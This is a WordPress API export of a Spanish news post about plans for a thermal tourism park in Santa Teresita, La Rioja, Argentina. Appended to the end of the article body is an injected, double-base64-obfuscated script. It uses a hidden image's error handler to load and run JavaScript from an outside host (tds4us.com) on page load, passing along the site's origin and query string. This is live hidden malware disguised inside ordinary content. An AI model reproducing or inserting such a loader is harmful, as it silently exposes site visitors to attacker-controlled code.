{"id":5242,"date":"2022-05-10T10:25:00","date_gmt":"2022-05-10T13:25:00","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5242"},"modified":"2025-08-13T16:20:23","modified_gmt":"2025-08-13T19:20:23","slug":"la-rioja-se-encamina-hacia-el-desarrollo-de-su-polo-termal","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5242","title":{"rendered":"La Rioja se encamina hacia el desarrollo de su Polo Termal"},"content":{"rendered":"\n<h6 class=\"has-text-color has-background wp-block-heading\" style=\"background-color:#0c5a87;color:#cfd3d7\"><em>Autoridades provinciales recorrieron la zona de Santa Teresita, en el departamento Arauco, donde el Ministerio de Turismo y Culturas, con el aporte de la empresa Parque E\u00f3lico, llevan adelante un master plan para el desarrollo de un centro tur\u00edstico y hotelero que aprovechar\u00e1 los beneficios de la cuenca termal que all\u00ed se encuentra.<\/em><\/h6>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/223536666.jpg\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/223536666-1024x484.jpg\" alt=\"\" class=\"wp-image-5243\" width=\"421\" height=\"198\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/223536666-1024x484.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/223536666-300x142.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/223536666-768x363.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/223536666-696x329.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/223536666-1068x505.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/223536666-889x420.jpg 889w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/223536666.jpg 1280w\" sizes=\"(max-width: 421px) 100vw, 421px\" \/><\/a><\/figure><\/div>\n\n\n\n<p class=\"has-drop-cap\">El ministro Gustavo Luna y el titular de PEA, Ariel Parmigiani, fueron los anfitriones de la recorrida en la que participaron el secretario General y Legal de la Gobernaci\u00f3n, Armando Molina, la secretaria de Comunicaci\u00f3n, Luz Sant\u00e1ngelo Carrizo, investigadores del CRILAR y especialistas nacionales e internacionales en termalismo, quienes desde hace un tiempo realizan tareas de prospecci\u00f3n de las aguas termales de toda la provincia.<\/p>\n\n\n\n<p>En este lugar, ubicado cerca de la hoster\u00eda termal de Santa Teresita, est\u00e1 prevista la construcci\u00f3n de un parque acu\u00e1tico termal que ser\u00e1 el inicio de un proyecto mucho m\u00e1s ambicioso del Gobierno provincial, que incluye el desarrollo de un polo tur\u00edstico con hoteles, restaurantes, espacios deportivos y recreativos. \u201cEl termalismo en La Rioja ya est\u00e1 en el radar de Turismo de la Naci\u00f3n, que apoyar\u00e1n a trav\u00e9s de sus programas de financiamiento este futuro complejo tur\u00edstico\u201d, destac\u00f3 el ministro Gustavo Luna.<\/p>\n\n\n\n<p>El titular de Parque E\u00f3lico Arauco, por su parte, resalt\u00f3 que desde hace tiempo un grupo de investigadores alemanes, junto al cient\u00edfico local Pablo Alasino, ya realizan trabajos de an\u00e1lisis y prospecci\u00f3n de las cualidades de esta gran cantera termal que posee la zona. Estas tareas y las futuras inversiones que realizar\u00e1 PEA, junto al acompa\u00f1amiento de la provincia, son partes del programa de Responsabilidad Social y Empresarial.<\/p>\n\n\n\n<p>Cabe destacar que el Ministerio de Turismo y Culturas ya trabaja en la realizaci\u00f3n del primer encuentro termal argentino que se desarrollar\u00e1 en La Rioja en el mes de junio, al mismo tiempo que se realiza, a trav\u00e9s de un prestigioso estudio internacional de arquitectura, el master plan de desarrollo termal en este lugar del departamento Arauco.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.elindependiente.com.ar\/pagina.php?id=310148#:~:text=Cabe%20destacar%20que%20el%20Ministerio%20de%20Turismo%20y,desarrollo%20termal%20en%20este%20lugar%20del%20departamento%20Arauco.\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_10-5-2022_10183_www.elindependiente.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-5244\" width=\"216\" height=\"43\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_10-5-2022_10183_www.elindependiente.com_.ar_.jpeg 805w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_10-5-2022_10183_www.elindependiente.com_.ar_-300x59.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_10-5-2022_10183_www.elindependiente.com_.ar_-768x152.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_10-5-2022_10183_www.elindependiente.com_.ar_-696x137.jpeg 696w\" sizes=\"(max-width: 216px) 100vw, 216px\" \/><\/a><figcaption>Fuente:<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/26155_1605787767.jpg\"><img decoding=\"async\" width=\"720\" height=\"540\" data-id=\"5245\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/26155_1605787767.jpg\" alt=\"\" class=\"wp-image-5245\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/26155_1605787767.jpg 720w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/26155_1605787767-300x225.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/26155_1605787767-80x60.jpg 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/26155_1605787767-265x198.jpg 265w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/26155_1605787767-696x522.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/26155_1605787767-560x420.jpg 560w\" sizes=\"(max-width: 720px) 100vw, 720px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita.jpg\"><img decoding=\"async\" width=\"550\" height=\"412\" data-id=\"5246\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita.jpg\" alt=\"\" class=\"wp-image-5246\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita.jpg 550w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-300x225.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-80x60.jpg 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-265x198.jpg 265w\" sizes=\"(max-width: 550px) 100vw, 550px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1.jpg\"><img decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"5247\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1-1024x768.jpg\" alt=\"\" class=\"wp-image-5247\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1-1024x768.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1-300x225.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1-768x576.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1-80x60.jpg 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1-265x198.jpg 265w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1-696x522.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1-1068x801.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1-560x420.jpg 560w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/termas-santa-teresita-1.jpg 1276w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Autoridades provinciales recorrieron la zona de Santa Teresita, en el departamento Arauco, donde el Ministerio de Turismo y Culturas, con el aporte de la empresa Parque E\u00f3lico, llevan adelante un master plan para el desarrollo de un centro tur\u00edstico y hotelero que aprovechar\u00e1 los beneficios de la cuenca termal que all\u00ed se encuentra. El ministro [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5245,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15,17],"tags":[],"class_list":["post-5242","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-de-bienestar","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5242","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5242"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5242\/revisions"}],"predecessor-version":[{"id":10680,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5242\/revisions\/10680"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5245"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5242"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5242"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5242"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}